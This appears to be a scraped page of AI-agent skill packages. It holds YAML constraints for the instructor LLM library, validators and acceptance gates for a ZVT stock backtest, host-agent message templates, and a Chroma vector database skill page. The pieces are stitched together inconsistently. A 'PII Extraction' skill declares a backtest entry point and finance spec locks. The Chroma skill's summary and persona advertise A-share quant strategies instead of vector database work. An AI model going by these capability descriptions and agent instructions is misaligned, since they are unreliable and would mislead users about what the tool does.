      tenacity actually caps at 30s total, so retries 3-5 never run; the resulting behavior is silent retry truncation that
      looks like 'instructor gave up too early'
    stage_ids:
    - llm_call
  - id: instructor-C-029
    when: When wiring observability (tracing, metrics, logfire/langfuse) around instructor
    action: 'register hooks ONLY against the 5 HookName events: completion:kwargs, completion:response, completion:error,
      completion:last_attempt, parse:error; instructor has no metrics framework and no built-in tracing — hooks are the sole
      observability surface'
    severity: medium
    kind: resource_boundary
    modality: must
    consequence: Calling Hooks.on() with an unrecognized hook_name raises ValueError per get_hook_name(); attempting to instrument
      intermediate states beyond the 5 events requires forking instructor — there is no extension API for new hook events
    stage_ids:
    - llm_call
    - validation
    - reask_loop
  - id: instructor-C-030
    when: When implementing a custom Mode value or extending instructor with a third-party mode
    action: register the new mode value in BOTH mode_handlers (processing/response.py:461-498) for schema injection AND REASK_HANDLERS
      (processing/response.py:645-695) for error feedback injection; a missing entry in mode_handlers raises ConfigurationError
      at handle_response_model
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Adding a new Mode enum value without entries in both dispatch dicts causes ConfigurationError at the first
      call; only registering in mode_handlers leaves reask broken (KeyError at handle_reask_kwargs); the symmetric registration
      is enforced by convention only, not by schema
    stage_ids:
    - mode_selection
    - schema_generation
    - reask_loop
  - id: instructor-C-031
    when: When passing user-supplied image URLs into instructor.Image.from_url that may include signed URLs whose underlying
      content changes
    action: use Image.from_url with signed URLs whose content is mutable (S3 presigned, expiring CDN paths) — the constructor
      is decorated with @lru_cache so the same URL string returns the cached image bytes regardless of subsequent content
      changes
    severity: medium
    kind: domain_rule
    modality: must_not
    consequence: Two independent uploads using the same signed URL get the cached first-fetched bytes; users see images switching
      for no apparent reason; the bug is invisible until cross-correlated by URL — caching is process-lifetime and there is
      no eviction control
    stage_ids:
    - schema_generation
  - id: instructor-C-032
    when: When subclassing or wrapping the Instructor class to add custom behavior on chat.completions.create or messages.create
    action: override the wrapped create method (returned by .chat.completions / .messages property accessors) at one place
      — all three @property accessors return self, so .chat.completions.create, .completions.create, and .messages.create
      all dispatch to the same underlying wrapped create method
    severity: medium
    kind: architecture_guardrail
    modality: must
    consequence: Naively overriding .chat.completions.create assuming a separate method per call style causes inconsistent
      behavior — Anthropic-style .messages.create still hits the original wrapped create because all accessors alias to self;
      subclass authors must understand the aliasing chain
    stage_ids:
    - provider_patch
  - id: instructor-C-033
    when: When marketing or describing the capability of an instructor-based PII extraction pipeline
    action: claim 'certified PII detection' or 'compliance-grade PII redaction' for output — instructor delegates all extraction
      to the LLM; UC-001 PII Extraction is documented as best-effort, not certified; HIPAA / GDPR / PCI compliance requires
      deterministic post-processing on top of any LLM extraction
    severity: high
    kind: claim_boundary
    modality: must_not
    consequence: Claiming certified PII detection invites legal exposure when the LLM hallucinates a missed PII field; instructor
      provides no recall/precision guarantees and the upstream issue tracker explicitly disclaims certified compliance
    stage_ids:
    - validation
  - id: instructor-C-034
    when: When describing the latency or freshness characteristics of an instructor-based pipeline that runs against polling-based
      provider APIs (Batch API, async submission flows)
    action: claim real-time guarantees for the pipeline output — UC-010 OpenAI Batch API and similar offline workflows have
      hours-scale latency by design; instructor merely wraps the submit/poll/retrieve cycle and adds no real-time path on
      top
    severity: medium
    kind: claim_boundary
    modality: must_not
    consequence: Marketing 'real-time' for batch-API-backed workflows misleads downstream consumers into building latency-sensitive
      systems on hours-scale infrastructure; the disconnect surfaces only after production workloads time out
    stage_ids:
    - llm_call
  - id: instructor-C-035
    when: When using instructor with strict validators on long completions (>4k tokens output) and high max_retries
    action: claim instructor handles context-window overflow — there is no truncation, no summarization, and no per-FailedAttempt
      size cap on the failed_attempts XML; long-completion + strict-validator workloads must add user-side hooks to truncate
      messages before each retry or accept InstructorRetryException as the failure mode
    severity: medium
    kind: claim_boundary
    modality: must_not
    consequence: Users believing instructor has built-in context management overprovision max_retries and underprovision context
      budget; the failure mode is InstructorRetryException (not LengthError), making root-cause diagnosis harder than necessary
    stage_ids:
    - reask_loop
  - id: instructor-C-036
    when: When promoting an instructor-based SQL safety pipeline (UC-008 safer_sql_example pattern)
    action: claim audited SQL injection prevention — UC-008's validator is user-defined and not externally audited; combining
      LLM generation with a user-side validator does NOT equal certified safety; certified SQL safety requires an independent
      SQL parser and policy engine
    severity: high
    kind: claim_boundary
    modality: must_not
    consequence: Marketing certified SQL safety on a user-defined-validator pipeline misleads adopters; common attacks (Unicode
      normalization, encoded payloads, parser-confusion patterns) bypass naive substring/regex validators that UC-008 example
      uses as a starting template
    stage_ids:
    - validation
  - id: instructor-C-037
    when: When writing new code that constructs an Instructor client
    action: prefer instructor.from_provider('provider/model') over per-provider factories like from_openai or from_anthropic;
      AGENT.md L30 and docs/concepts/patching.md tip block recommend from_provider as the canonical entry; per-provider factories
      remain for explicit setups but are no longer the default-recommended path
    severity: low
    kind: operational_lesson
    modality: should
    consequence: Per-provider factories couple call sites to specific providers; from_provider centralizes the choice and
      survives provider migrations more cleanly; ignoring the project recommendation creates maintenance debt that compounds
      across multi-provider deployments
    stage_ids:
    - provider_patch
  - id: instructor-C-038
    when: When validating user-supplied mode= argument in custom Instructor wrappers or middleware
    action: 'use raise ModeError (matching the canonical pattern in 13 provider factories: anthropic / cohere / gemini / groq
      / bedrock / fireworks / vertexai / xai / writer / cerebras / perplexity / genai / mistral) rather than Python assert;
      assert is silently stripped under python -O while raise ModeError fires unconditionally'
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Using assert for mode validation creates the same -O fragility documented for from_openai (BD-G02); raise
      ModeError is the project's canonical pattern across 13 of 20 providers and the safer default for custom wrappers
    stage_ids:
    - mode_selection
  - id: instructor-C-039
    when: When the messages payload may contain instructor.Image / Audio / PDF instances
    action: ensure messages pass through convert_messages (called at instructor/processing/response.py:511-515 invocation
      site) before reaching the provider — convert_messages walks the messages list and converts each multimodal Pydantic
      object to the provider-specific format; bypassing it sends raw Pydantic objects to the SDK which will reject them
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: Skipping convert_messages causes the provider SDK to receive raw Image/Audio/PDF Pydantic instances it cannot
      serialize; error surfaces as TypeError or schema validation failure deep inside the SDK, far from the user-side construction
      site
    stage_ids:
    - schema_generation
  - id: instructor-C-040
    when: When passing a tenacity.Retrying or AsyncRetrying object as max_retries instead of an int
    action: 'ensure the Retrying instance type matches the call surface — pass tenacity.AsyncRetrying to AsyncInstructor.create
      paths and tenacity.Retrying to sync Instructor.create; initialize_retrying validates: passing the wrong subclass raises
      InstructorRetryException with ''max_retries must be an int or a tenacity.Retrying/tenacity.AsyncRetrying object'''
    severity: medium
    kind: domain_rule
    modality: must
    consequence: Passing tenacity.Retrying to async paths or AsyncRetrying to sync paths produces an immediate raise from
      initialize_retrying; the failure surfaces as InstructorRetryException with no clear hint that the issue is sync/async
      mismatch rather than retry-budget exhaustion
    stage_ids:
    - llm_call
  - id: instructor-C-041
    when: When implementing a custom validator that hooks into instructor's validation pipeline via Annotated[X, BeforeValidator(...)]
      or AfterValidator
    action: ensure the validator function is Pydantic v2-compatible and does NOT rely on legacy v1 ValidationInfo shape; instructor
      calls model_validate_json or TypeAdapter().validate_json which expects v2 semantics; v1-style validator functions are
      silently dropped (decorator ignored) without raising
    severity: high
    kind: domain_rule
    modality: must
    consequence: v1-style validator functions registered via Annotated decorators get silently dropped because v2 BaseModel
      ignores v1 decorator metadata; reask path receives no ValidationError, malformed LLM output passes silently, and the
      missing validation is discovered only via integration tests
    stage_ids:
    - validation
  - id: instructor-C-042
    when: When implementing a provider-specific reask handler for a new mode
    action: match the provider's native error feedback channel — use tool_result with is_error=true for Anthropic-family modes,
      role='tool' messages for OpenAI tool-calling modes, role='user' text messages for MD_JSON / JSON modes; do NOT use a
      single text-injection style across all providers because models self-correct better when error feedback uses the same
      shape as the original tool/JSON interaction (BD-004)
    severity: medium
    kind: architecture_guardrail
    modality: must
    consequence: Using role='user' text injection for Anthropic tool-mode reask reduces the model's ability to associate the
      error with the failed tool_use; reask round-trips become less effective, total retry count increases, and total API
      cost rises — measurable in benchmark runs (BD-004 rationale)
    stage_ids:
    - reask_loop
    derived_from_bd_id: BD-004
  - id: instructor-C-043
    when: When the LLM may return multiple structured items in a single completion (parallel tool calls, list output)
    action: wrap response_model in Iterable[X] (e.g. response_model=Iterable[User]) and call create_iterable explicitly on
      sync Instructor; AsyncInstructor.create auto-forwards Iterable[X] but sync does not (BD-014); for partial streaming
      wrap in Partial[X] and call create_partial
    severity: high
    kind: domain_rule
    modality: must
    consequence: Calling Instructor.create with Iterable[X] response_model on sync returns an unconsumed generator object;
      the LLM call has not actually happened at return time; iterating produces zero items and the caller cannot tell whether
      the LLM returned empty results or whether the wrong API was used
    stage_ids:
    - streaming_partial
    - provider_patch
  - id: instructor-C-044
    when: When adding a new provider (the 21st provider) to instructor
    action: implement from_NEW_PROVIDER that calls instructor.patch(client=NEW_CLIENT, mode=...) internally and registers
      provider-specific handlers in mode_handlers and REASK_HANDLERS dicts; do NOT bypass instructor.patch because all 20
      providers share one wrapped create() implementation and the retry / validation / hooks / cache logic is reused as-is
    severity: high
    kind: architecture_guardrail
    modality: must
    consequence: A new from_NEW that bypasses instructor.patch loses the entire reusable wrapper (no retry, no reask, no hooks,
      no cache); the provider works for happy-path calls but degrades silently on validation failure because the canonical
      wrapper logic was not invoked
    stage_ids:
    - provider_patch
  - id: instructor-C-045
    when: When extending instructor with a new mode, schema generator, or reask handler
    action: introduce an ABC / Protocol surface for modes — instructor deliberately uses flat dispatch dicts (mode_handlers
      + REASK_HANDLERS) keyed by Mode enum value because 20 providers x 36 modes = 720 combinations would explode any ABC
      inheritance hierarchy; ABC use is reserved for the 9 narrow @abstractmethod surfaces (BaseCache 2 + BatchProvider 7)
    severity: medium
    kind: architecture_guardrail
    modality: must_not
    consequence: Replacing the flat dict dispatch with an ABC requires writing 720 method overrides in the worst case; the
      project chose flat dispatch for scaling reasons; any PR that introduces ABC for modes will be rejected per BD-015 rationale
    stage_ids:
    - mode_selection
    - schema_generation
    - reask_loop
    derived_from_bd_id: BD-015
  - id: instructor-C-046
    when: When constructing instructor.Image from raw base64 bytes on Python 3.13+
    action: rely on Image.from_raw_base64's hand-rolled magic-byte detection (since imghdr was removed in 3.13); do NOT call
      imghdr.what() in user code as a parallel detection path — the function is gone and the import will ImportError at module
      load on 3.13+
    severity: medium
    kind: resource_boundary
    modality: must
    consequence: Code that imports imghdr for backward compatibility breaks on Python 3.13; the runtime ImportError prevents
      any instructor.Image use until the import is removed; instructor's hand-rolled detection at multimodal.py:155-182 is
      the canonical replacement
    stage_ids:
    - schema_generation
  - id: instructor-C-047
    when: When using instructor's templating feature (passing context= kwarg with jinja2 template strings in messages)
    action: rely on instructor's jinja2 SandboxedEnvironment to fully prevent code execution from untrusted user-supplied
      templates — SandboxedEnvironment blocks unsafe attribute access but does not validate template logic; user-controlled
      templates can still leak data via legitimate filter chains
    severity: high
    kind: domain_rule
    modality: must_not
    consequence: Treating SandboxedEnvironment as a security boundary for fully-untrusted user templates risks information
      disclosure via filter chains and template introspection; sandboxing is a defense-in-depth measure not a complete sandbox
      — never let untrusted users author the template body
    stage_ids:
    - llm_call
output_validator:
  assertions:
  - id: OV-01
    check_predicate: all(p in inspect.getsource(zvt.factors.algorithm.macd) for p in ['slow=26', 'fast=12', 'n=9'])
    failure_message: 'FATAL: MACD params drifted from (fast=12, slow=26, n=9) — SL-08 violation, non-reproducible signals'
    business_meaning: Standard MACD parameters are a semantic lock; drift makes results incomparable with industry-standard
      indicators and non-reproducible.
    source_ids:
    - SL-08
    - BD-036
  - id: OV-02
    check_predicate: result.get('total_trades', 0) > 0 or result.get('explicit_zero_trade_ack') is True
    failure_message: Zero trades executed — likely missing pre-fetched data (see PC-02) or over-restrictive filters
    business_meaning: A backtest with zero trades is not a valid result; either data is missing or the strategy never triggered.
      Structural non-emptiness check is insufficient — we need business confirmation.
    source_ids:
    - SL-01
    - finance-C-073
  - id: OV-03
    check_predicate: result.get('annual_return') is None or abs(float(result['annual_return'])) <= 5.0
    failure_message: 'FATAL: |annual_return| > 500% — likely look-ahead bias or data error'
    business_meaning: Annual returns exceeding 500% are physically implausible for A-share strategies; indicates look-ahead
      bias or corrupt data.
    source_ids: []
  - id: OV-04
    check_predicate: result.get('holding_change_pct') is None or abs(float(result['holding_change_pct'])) <= 1.0
    failure_message: 'FATAL: |holding_change_pct| > 100% — physically impossible'
    business_meaning: Holding change percentage cannot exceed 100%; violation indicates position accounting error.
    source_ids:
    - BD-029
  - id: OV-05
    check_predicate: result.get('max_drawdown') is None or abs(float(result['max_drawdown'])) <= 1.0
    failure_message: 'FATAL: |max_drawdown| > 100% — impossible for non-leveraged account'
    business_meaning: Maximum drawdown cannot exceed 100% without leverage; violation indicates calculation error or look-ahead
      bias.
    source_ids: []
  - id: OV-06
    check_predicate: not (hasattr(result, 'trade_log') and result.trade_log and any(result.trade_log[i].action == 'sell' and
      i+1 < len(result.trade_log) and result.trade_log[i+1].action == 'buy' and result.trade_log[i].timestamp == result.trade_log[i+1].timestamp
      for i in range(len(result.trade_log)-1)))
    failure_message: 'FATAL: buy-before-sell detected in same cycle — SL-01 violation, creates implicit leverage'
    business_meaning: SL-01 requires sell() before buy() in each cycle; violation means available_long was not updated before
      buying, risking duplicate positions.
    source_ids:
    - SL-01
  scaffold:
    validate_py_path: '{workspace}/validate.py'
    tail_block: "# === DO NOT MODIFY BELOW THIS LINE ===\nif __name__ == \"__main__\":\n    result = run_backtest()\n    from\
      \ validate import enforce_validation\n    enforce_validation(result, output_path=\"{workspace}/result.csv\")\n# ===\
      \ END DO NOT MODIFY ==="
  enforcement_protocol: 1. Never edit validate.py. 2. Never delete the DO NOT MODIFY tail block from the main script. 3. Never
    wrap enforce_validation() in try/except. 4. Never rewrite result write logic — it MUST go through enforce_validation.
    5. If validate.py raises ImportError, fix the dependency, do not remove the call.
acceptance:
  hard_gates:
  - id: G1
    check: '{workspace}/result.csv exists AND file size > 0'
    on_fail: Strategy did not produce output; check run_backtest() return value and enforce_validation() call
  - id: G2
    check: '{workspace}/result.csv.validation_passed marker file exists'
    on_fail: Validation did not complete; review validate.py output and fix assertion failures
  - id: G3
    check: 'Main script contains literal: from validate import enforce_validation'
    on_fail: Validation chain stripped; re-add the import in the DO NOT MODIFY block
  - id: G4
    check: 'Main script contains literal: # === DO NOT MODIFY BELOW THIS LINE ==='
    on_fail: Validation fence removed; regenerate DO NOT MODIFY tail block
  - id: G5
    check: 'result.csv has at least 1 row: pandas.read_csv(result.csv).shape[0] >= 1'
    on_fail: Empty result; check if trade_log is non-empty and factors generated signals. Confirm PC-02 (k-data exists) passed.
  - id: G6
    check: 'If MACD strategy: source contains ''slow=26'' AND ''fast=12'' AND ''n=9'' in algorithm call'
    on_fail: MACD params drifted from SL-08 lock; restore standard (12, 26, 9)
  - id: G7
    check: 'For data pipeline tasks: result.csv contains ''entity_id'' and ''timestamp'' fields'
    on_fail: Missing required columns; check Mixin.query_data return schema and DataFrame MultiIndex reset_index() before
      writing
  - id: G8
    check: 'OV-03 passes: abs(annual_return) <= 5.0 (500%)'
    on_fail: Physical plausibility check failed; investigate look-ahead bias or data corruption in input kdata
  soft_gates:
  - id: SG-01
    rubric: 'Strategy narrative consistency: user intent aligns with generated strategy.py logic. dim_a: signal direction
      (buy/sell) matches intent [1-5, pass>=4]; dim_b: frequency (daily/intraday) aligns [1-5, pass>=4]; dim_c: risk controls
      match user intent [1-5, pass>=4].'
  - id: SG-02
    rubric: 'Factor combination quality. dim_a: no highly correlated factor duplication [1-5, pass>=4]; dim_b: multi-period
      alignment correct [1-5, pass>=4]; dim_c: liquidity filter present for A-share [1-5, pass>=4].'
  - id: SG-03
    rubric: 'Data source selection appropriateness. dim_a: coverage sufficient for target entities [1-5, pass>=4]; dim_b:
      provider latency acceptable for strategy frequency [1-5, pass>=4]; dim_c: no unauthorized provider used without credentials
      [1-5, pass>=4].'
skill_crystallization:
  trigger: all_hard_gates_passed AND user_opt_out_skill_saving != true
  output_path_template: '{workspace}/../skills/{slug}.skill'
  slug_template: '{blueprint_id_short}-{uc_id_lower}'
  captured_fields:
  - name
  - intent_keywords
  - entry_point_script
  - validate_script
  - fatal_constraints
  - spec_locks
  - preconditions
  - install_recipes
  - human_summary_translated
  action: 'After all Hard Gates PASS, resolve slug via slug_template using the executed UC, then write the .skill YAML file
    at output_path_template. Notify user in their detected locale: ''Skill saved as {slug}.skill — next time say one of {sample_triggers}
    from the matched UC to invoke directly.'''
  violation_signal: All hard gates passed but no .skill file exists at expected path
  skill_file_schema:
    name: finance-bp-139 / PII Extraction and Scrub Replacement
    version: v6.1
    intent_keywords:
    - PII
    - scrub
    - redact
    - sensitive data
    - compliance extraction
    entry_point: run_backtest
    fatal_guards:
    - SL-01
    - SL-02
    - SL-03
    - SL-04
    - SL-05
    - SL-06
    - SL-07
    - SL-08
    - SL-10
    - SL-11
    - SL-12
    spec_locks:
    - SL-01
    - SL-02
    - SL-03
    - SL-04
    - SL-05
    - SL-06
    - SL-07
    - SL-08
    - SL-09
    - SL-10
    - SL-11
    - SL-12
    preconditions:
    - PC-01
    - PC-02
    - PC-03
    - PC-04
post_install_notice:
  trigger: skill_installation_complete
  message_template:
    positioning: I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow.
    capability_catalog:
      group_strategy:
        source: auto_grouped
        strategy_reason: auto-grouped by UC.type (2 distinct values, balanced distribution)
      groups:
      - group_id: complete_strategy
        name: Complete Strategy
        description: ''
        emoji: 📦
        uc_count: 9
        ucs:
        - uc_id: UC-001
          name: PII Extraction and Scrub Replacement
          short_description: Extract PII fields (SSN, phone, email, name, address) from unstructured documents and produce
            a scrubbed version
          sample_triggers:
          - PII
          - scrub
          - redact
        - uc_id: UC-002
          name: SOC Occupation Code Classification with field_validator
          short_description: Map free-text job descriptions to standardized SOC occupation codes; use Pydantic field_validator
            to reject hallucinated codes and let reask retry wit
          sample_triggers:
          - classification
          - SOC code
          - field_validator
        - uc_id: UC-003
          name: Knowledge Graph Extraction (nodes + edges)
          short_description: Convert free text into a structured KnowledgeGraph(nodes, edges)
          sample_triggers:
          - knowledge graph
          - KG
          - entity relations
        - uc_id: UC-004
          name: Citation Substring Extraction with Fuzzy Match Verification
          short_description: Extract facts plus quoted source substrings; verify each citation's substring exists in the source
            text via regex / fuzzy match
          sample_triggers:
          - citation
          - fact-checking
          - RAG verification
        - uc_id: UC-005
          name: Parallel Multi-tool Routing
          short_description: Single LLM request triggers multiple tool calls in parallel (e.g
          sample_triggers:
          - parallel tools
          - Iterable
          - Union types
        - uc_id: UC-006
          name: Partial Streaming for UI Real-time Render
          short_description: Stream Pydantic-typed fields as JSON arrives so UI can render typewriter-style progressive updates
          sample_triggers:
          - partial streaming
          - UI typewriter
          - rich console
        - uc_id: UC-007
          name: AI-driven SQLModel ORM Entity Generation
          short_description: Use LLM to generate SQLModel ORM entity definitions and write them to a database
          sample_triggers:
          - SQLModel
          - ORM generation
          - ResponseSchema
        - uc_id: UC-008
          name: Safe SQL Generation with Guardrail
          short_description: Generate SQL queries with a custom validator that prevents injection / unsafe operations
          sample_triggers:
          - SQL generation
          - safer SQL
          - injection prevention
        - uc_id: UC-009
          name: Query Planner DAG Decomposition
          short_description: Decompose a natural-language question into a DAG of executable subqueries with explicit dependencies
          sample_triggers:
          - query planning
          - DAG
          - task decomposition
      - group_id: data_pipeline
        name: Data Pipeline
        description: ''
        emoji: 📊
        uc_count: 1
        ucs:
        - uc_id: UC-010
          name: OpenAI Batch API Offline Classification
          short_description: Bulk-classify large text corpora using OpenAI's Batch API endpoint for cost reduction
          sample_triggers:
          - batch processing
          - offline classification
          - cost reduction
    call_to_action: Tell me which one you want to try.
    featured_entries:
    - uc_id: UC-001
      beginner_prompt: Try pii extraction and scrub replacement
      auto_selected: true
    - uc_id: UC-002
      beginner_prompt: Try soc occupation code classification with field_validator
      auto_selected: true
    - uc_id: UC-003
      beginner_prompt: Try knowledge graph extraction (nodes + edges)
      auto_selected: true
    more_info_hint: Ask me 'what else can you do?' to see all 10 capabilities.
  locale_rendering:
    instruction: On skill_installation_complete, translate ALL user-facing strings (positioning + capability_catalog.groups[].name
      + capability_catalog.groups[].description + capability_catalog.groups[].ucs[].short_description + call_to_action + featured_entries[].beginner_prompt
      + more_info_hint) into detected user locale per locale_contract. Preserve UC-IDs, group_id, emoji, and sample_triggers
      verbatim.
    preserve_verbatim:
    - UC-IDs
    - group_id
    - emoji
    - sample_triggers
    - technical_class_names
  enforcement:
    action: 'Host agent MUST send composed message to user as the FIRST user-facing response after skill_installation_complete
      event. Message MUST contain: positioning, capability_catalog (rendered as markdown tables per group), 3 featured_entries,
      call_to_action, and more_info_hint.'
    violation_code: PIN-01
    violation_signal: First user-facing message post-install does not contain the full capability_catalog (all UCs grouped)
      OR skips featured_entries OR skips call_to_action.
human_summary:
  persona: Doraemon
  what_i_can_do:
    tagline: 'I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow. Just tell me
      what you want; I''ll write the code, you don''t have to dig docs. (Heads up: ZVT natively supports A-share, HK, and
      crypto. US stocks — stockus_nasdaq_AAPL — are half-baked; don''t bother for serious work.)'
    use_cases:
    - Knowledge Graph Extraction (nodes + edges)
    - SOC Occupation Code Classification with field_validator
    - PII Extraction and Scrub Replacement
    - A-share MACD daily golden-cross backtest with hfq price adjustment from eastmoney
    - 'End-to-end ZVT pipeline: FinanceRecorder + GoodCompanyFactor + StockTrader'
    - Multi-factor strategy with TargetSelector (AND mode) combining MACD + volume breakout
    - Index composition data collection (SZ1000, SZ2000) with EM recorder
  what_i_auto_fetch:
  - ZVT stage pipeline structure (data_collection → visualization) from LATEST.yaml
  - Semantic locks (SL-01 through SL-12) — especially sell-before-buy ordering and MACD params
  - Fatal constraints (finance-C-*) relevant to your target strategy type
  - 'Default parameters: MACD(12,26,9), hfq adjustment, buy_cost=0.001, base_capital=1M CNY'
  - Entity ID format (stock_sh_600000) and DataFrame MultiIndex convention
  - Provider-specific recorder class names and required class attributes
  what_i_ask_you:
  - 'Target market: A-share (default), HK, or crypto? (US stocks in ZVT are half-baked — stockus_nasdaq_AAPL exists but coverage
    is thin)'
  - 'Data source / provider: eastmoney (free, no account), joinquant (account+paid), baostock (free, good history), akshare,
    or qmt (broker)?'
  - 'Strategy type: MACD golden-cross, MA crossover, volume breakout, fundamental screen, or custom factor?'
  - 'Time range: start_timestamp and end_timestamp for backtest period'
  - 'Target entity IDs: specific stocks (stock_sh_600000) or index components (SZ1000)?'
  locale_rendering:
    instruction: On first user contact, translate all fields above into detected user locale while preserving Doraemon persona
      (direct, frank, mildly snarky, knows limits).
    preserve_verbatim:
    - BD-IDs
    - SL-IDs
    - UC-IDs
    - finance-C-IDs
    - class_names
    - function_names
    - file_paths
    - numeric_thresholds

ClawHub Coding Data Analysis+2

T@clawhub-tangweigang-jpg-8679fec286

Chroma Vector Db

Skill

Chroma 向量数据库：Rust 内核（v1.0.0+ 重写，2025-03），多语言客户端SDK。单节点用 PersistentClient（SQLite + 本地 HNSW）或 EphemeralClient（内存）；分布式 / 云用 SPANN + BLOCKFILE on S3/GCS。 Chroma...

---
name: chroma-vector-db
description: |-
  Chroma 向量数据库：Rust 内核（v1.0.0+ 重写，2025-03），多语言客户端SDK。单节点用 PersistentClient（SQLite + 本地 HNSW）或 EphemeralClient（内存）；分布式 / 云用 SPANN + BLOCKFILE on S3/GCS。
  Chroma vector database: Rust core (v1.0.0+ rewrite, 2025-03) with multi-language client SDKs. Single-node uses PersistentClient (SQLite + local HNSW) or EphemeralClient (in-memory); distributed/cloud uses SPANN + BLOCKFILE on S3/GCS. 25+ EmbeddingFunction providers shipped.
license: MIT-0
compatibility: AI engineering knowledge skill — host AI consumes seed.yaml directly. No installation required.
metadata:
  version: "v0.1.0"
  blueprint_id: "finance-bp-138"
  blueprint_source: "chroma-core/chroma"
  blueprint_commit: "598f85f0872746b1e821ffddca5c1e7058cd8b9e"
  category: ai-engineering
  doramagic_url: "https://doramagic.ai/zh/crystal/chroma-vector-db"
  openclaw:
    skillKey: chroma-vector-db
    category: ai-engineering
    primaryEnv: knowledge
---
# 这个 skill 适合什么用户？能做哪些任务？

## 概览

Chroma 是 Rust 内核的开源向量数据库（github.com/chroma-core/chroma，v1.0.0+ 2025-03 重写）。单节点模式用 PersistentClient（SQLite 元数据 + 本地 HNSW 索引）或 EphemeralClient（内存）；分布式 / 云模式用 SPANN 索引+ 自研 BLOCKFILE 存储 on S3/GCS。

数据路径：Client Factory → API 层（v1.0.0 起 Rust 默认）→ Segment 层（本地 2 段 / 分布式 3 段）→ Index（HNSW 或 SPANN）→ 持久化。Embed...

**Doramagic 晶体页**: https://doramagic.ai/zh/crystal/chroma-vector-db

## 知识规模

- **52 条约束** (3 fatal + 49 non-fatal)
- 上游源码: `chroma-core/chroma` @ commit `598f85f0`
- 蓝图 ID: `finance-bp-138`

## 用法

Host AI（Claude Code / Cursor / OpenClaw）读 `references/seed.yaml`，按其中的：
- `intent_router` 匹配用户意图
- `architecture` 理解项目架构
- `constraints` 应用 anti-pattern 约束
- `business_decisions` 参考核心设计决策

## FAQ 摘要

### 这个 skill 适合什么用户？能做哪些任务？
适合需要向量数据库支持 RAG / 推荐 / 语义搜索的工程师：原型开发用EphemeralClient，本地小规模用 PersistentClient，生产分布式用云SPANN。25+ EmbeddingFunction 一键切换。访问 doramagic.ai/r/chroma 查看完整用例。

### 需要准备什么环境？依赖什么？
**SQLite ≥ 3.35.0 是硬要求**（chromadb/__init__.py:137-155 检查并 raise，Colab 自动 hot-swap 到 pysqlite3-binary）。Python ≥ 3.9。服务端 / 分布式需要 Rust 工具链或预构建 docker。可选：hosted EF 的 provider API key（OpenAI / Cohere 等）。

### 会踩哪些坑？这个 skill 怎么防护？
本 skill 内置 52 条约束（3 条 fatal）。典型踩坑：(1) cosine 实现实际是 `1 - dot(a,b)`，假定向量预归一化——未归一化数据score 会偏；(2) v1.0.0 Rust 默认静默忽略 4 个旧 Python 设置（chroma_server_nofile 等）——配置文件没报错但不生效；

---

完整文档: 见 `references/seed.yaml` (v6.1 schema). 浏览页: https://doramagic.ai/zh/crystal/chroma-vector-db

FILE:human_summary.md
# finance-bp-138-v6.1 — Human Summary

**Persona**: Doraemon

> I help you build quant strategies on A-share with ZVT — from data fetch to backtest, one flow. Just tell me what you want; I'll write the code, you don't have to dig docs. (Heads up: ZVT natively supports A-share, HK, and crypto. US stocks — stockus_nasdaq_AAPL — are half-baked; don't bother for serious work.)

## What I Can Do

- Local persistent database (PersistentClient)
- Where-Filter metadata-scoped retrieval
- RAG basics (chat-with-your-documents)
- A-share MACD daily golden-cross backtest with hfq price adjustment from eastmoney
- End-to-end ZVT pipeline: FinanceRecorder + GoodCompanyFactor + StockTrader
- Multi-factor strategy with TargetSelector (AND mode) combining MACD + volume breakout
- Index composition data collection (SZ1000, SZ2000) with EM recorder

## What I Auto-Fetch

- ZVT stage pipeline structure (data_collection → visualization) from LATEST.yaml
- Semantic locks (SL-01 through SL-12) — especially sell-before-buy ordering and MACD params
- Fatal constraints (finance-C-*) relevant to your target strategy type
- Default parameters: MACD(12,26,9), hfq adjustment, buy_cost=0.001, base_capital=1M CNY
- Entity ID format (stock_sh_600000) and DataFrame MultiIndex convention
- Provider-specific recorder class names and required class attributes

## What I Ask You

- Target market: A-share (default), HK, or crypto? (US stocks in ZVT are half-baked — stockus_nasdaq_AAPL exists but coverage is thin)
- Data source / provider: eastmoney (free, no account), joinquant (account+paid), baostock (free, good history), akshare, or qmt (broker)?
- Strategy type: MACD golden-cross, MA crossover, volume breakout, fundamental screen, or custom factor?
- Time range: start_timestamp and end_timestamp for backtest period
- Target entity IDs: specific stocks (stock_sh_600000) or index components (SZ1000)?

## Locale Rendering

**Instruction**: On first user contact, translate all fields above into detected user locale while preserving Doraemon persona (direct, frank, mildly snarky, knows limits).

**Preserve verbatim**: BD-IDs, SL-IDs, UC-IDs, finance-C-IDs, class_names, function_names, file_paths, numeric_thresholds

---

*Generated by compile_crystal_skeleton.py v5.0 for finance-bp-138-v6.1*
*All content is English source — agent translates on first user contact.*
FILE:references/seed.yaml
meta:
  id: finance-bp-138-v6.1
  version: v6.1
  blueprint_id: finance-bp-138
  sop_version: crystal-compilation-v6.1
  source_language: en
  compiled_at: '2026-04-25T09:19:04.243962+00:00'
  target_host: openclaw
  authoritative_artifact:
    primary: seed.yaml
    non_authoritative_derivatives:
    - SKILL.md (host-generated summary, may lag)
    - HEARTBEAT.md (host telemetry)
    - memory/*.md (host conversational memory)
    rule: On any behavioral decision (preconditions check, OV assertion, EQ rule firing, spec_lock verification), agents MUST
      re-read seed.yaml. Derivatives are for UI display only and may be out-of-date.
  execution_protocol:
    install_trigger:
    - Execute resources.host_adapter.install_recipes[] in declared order
    - Verify each package with import check before proceeding
    execute_trigger: When user intent matches intent_router.uc_entries[].positive_terms AND user uses action verb (run/execute/跑/执行/backtest/fetch/collect)
    on_execute:
    - Reload seed.yaml (do not rely on SKILL.md or cached summaries)
    - Run preconditions[] in declared order; halt on first fatal failure with on_fail message to user
    - Enter context_state_machine.CA1_MEMORY_CHECKED state
    - Evaluate evidence_quality.enforcement_rules[]; prepend user_disclosure_template
    - Translate user_facing_fields to user locale per locale_contract
    workspace_resolution:
      scripts_path: '{host_workspace}/scripts/'
      skills_path: '{host_workspace}/skills/'
      trace_path: '{host_workspace}/.trace/'
locale_contract:
  source_language: en
  user_facing_fields:
  - human_summary.what_i_can_do.tagline
  - human_summary.what_i_can_do.use_cases[]
  - human_summary.what_i_auto_fetch[]
  - human_summary.what_i_ask_you[]
  - evidence_quality.user_disclosure_template
  - post_install_notice.message_template.positioning
